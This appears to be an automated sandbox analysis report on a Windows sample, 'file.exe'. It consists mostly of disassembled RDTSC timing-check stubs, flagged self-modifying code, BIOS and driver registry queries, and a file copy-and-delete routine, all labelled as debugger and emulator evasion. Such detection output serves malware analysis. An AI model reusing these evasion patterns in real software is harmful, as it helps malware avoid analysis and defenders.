              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1400EED second address: 1400EF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1400EF1 second address: 1400EF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140727F second address: 1407283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14076FA second address: 1407719 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F4378D5BDD9h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14079CE second address: 14079D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14081B9 second address: 14081C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14081C1 second address: 14081C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14081C7 second address: 14081E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4378D5BDCFh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14084F9 second address: 1408527 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4378B444A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnc 00007F4378B444B2h 0x00000010 jmp 00007F4378B444ADh 0x00000015 popad 0x00000016 push ecx 0x00000017 push ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1408527 second address: 140852D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1408AC0 second address: 1408AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136B5DF second address: 136B5E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140BD32 second address: 140BD4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4378B444B5h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140BD4D second address: 140BD53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140BD53 second address: 140BD59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140BD59 second address: 140BD5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140BD5D second address: 140BD63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140BED7 second address: 140BEDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140C07B second address: 140C081 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140C081 second address: 140C087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140C087 second address: 140C08B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140C357 second address: 140C35D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140C35D second address: 140C382 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4378B444AFh 0x00000007 jc 00007F4378B444A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 je 00007F4378B444A6h 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140C382 second address: 140C386 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140C386 second address: 140C394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F4378B444A6h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140C394 second address: 140C398 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140C398 second address: 140C39E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140C39E second address: 140C3A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140C3A4 second address: 140C3DC instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4378B444D0h 0x00000008 jmp 00007F4378B444B2h 0x0000000d jmp 00007F4378B444B8h 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140C539 second address: 140C53D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140C53D second address: 140C544 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1416F2B second address: 1416F33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14174FA second address: 14174FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14174FF second address: 1417509 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F4378D5BDC6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1417509 second address: 141750D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141763B second address: 1417650 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4378D5BDC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007F4378D5BDC6h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1417650 second address: 1417660 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4378B444A6h 0x00000008 jo 00007F4378B444A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1417660 second address: 141767A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4378D5BDD4h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141767A second address: 141767E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141767E second address: 1417682 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14184C7 second address: 14184CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141DF36 second address: 141DF53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4378D5BDD8h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141DF53 second address: 141DF5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F4378B444A6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141DF5D second address: 141DF80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4378D5BDD9h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141DF80 second address: 141DF86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141DF86 second address: 141DF8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1440592 second address: 14405B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4378B444B8h 0x00000009 popad 0x0000000a je 00007F4378B444B2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14489E2 second address: 14489E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14472F7 second address: 1447318 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4378B444B1h 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F4378B444A6h 0x0000000f jnc 00007F4378B444A6h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14475DC second address: 14475E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14476EF second address: 14476F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14476F5 second address: 1447714 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4378D5BDD5h 0x00000007 jo 00007F4378D5BDC6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1447714 second address: 144772B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4378B444B1h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144772B second address: 1447731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1447731 second address: 1447735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1447D1F second address: 1447D23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1447D23 second address: 1447D29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1447D29 second address: 1447D39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F4378D5BDC6h 0x0000000a ja 00007F4378D5BDC6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144D152 second address: 144D15C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4378B444A6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144D15C second address: 144D160 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144D160 second address: 144D168 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144D168 second address: 144D16E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145EDD6 second address: 145EDEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jl 00007F4378B444A6h 0x00000009 jnc 00007F4378B444A6h 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145EDEC second address: 145EE18 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F4378D5BDC8h 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 jmp 00007F4378D5BDD4h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145EE18 second address: 145EE26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4378B444AAh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145EE26 second address: 145EE2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145EE2A second address: 145EE30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146C2F7 second address: 146C307 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4378D5BDC6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop ebx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14821CF second address: 14821D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1482310 second address: 1482316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1482316 second address: 148231A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148231A second address: 148233E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4378D5BDD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148233E second address: 1482342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1482592 second address: 14825D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4378D5BDD6h 0x00000007 pushad 0x00000008 jc 00007F4378D5BDC6h 0x0000000e jg 00007F4378D5BDC6h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F4378D5BDD6h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14825D3 second address: 14825DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14825DF second address: 14825E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148272F second address: 148276D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jbe 00007F4378B444F1h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4378B444B9h 0x00000012 jmp 00007F4378B444B8h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1482EC1 second address: 1482EDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4378D5BDD4h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148303A second address: 148305F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4378B444A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 jns 00007F4378B444A6h 0x00000016 popad 0x00000017 jmp 00007F4378B444AEh 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1488AA6 second address: 1488AC5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4378D5BDC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4378D5BDCDh 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1488AC5 second address: 1488AFB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F4378B444B4h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000004h 0x0000000e mov dx, cx 0x00000011 add dh, FFFFFFAFh 0x00000014 push D988C8F6h 0x00000019 je 00007F4378B444B2h 0x0000001f jbe 00007F4378B444ACh 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1488D86 second address: 1488D90 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4378D5BDC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58B035A second address: 58B035E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58B035E second address: 58B0364 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58B0364 second address: 58B036A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58B036A second address: 58B036E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58B036E second address: 58B03A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F4378B444B6h 0x00000012 sub cx, A6F8h 0x00000017 jmp 00007F4378B444ABh 0x0000001c popfd 0x0000001d mov ecx, 05CBB42Fh 0x00000022 popad 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58B03A8 second address: 58B03BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4378D5BDD0h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58B03BC second address: 58B03C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58B03C0 second address: 58B03EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F4378D5BDD7h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push edx 0x00000014 pop ecx 0x00000015 mov esi, edi 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58B03EA second address: 58B0411 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4378B444B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dx, 4030h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58B0411 second address: 58B0417 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AB269 second address: 13AB26F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 13C5C89 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1426698 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01378868 rdtsc 0_2_01378868
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-26452
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-25270
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.8 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00FC18A0
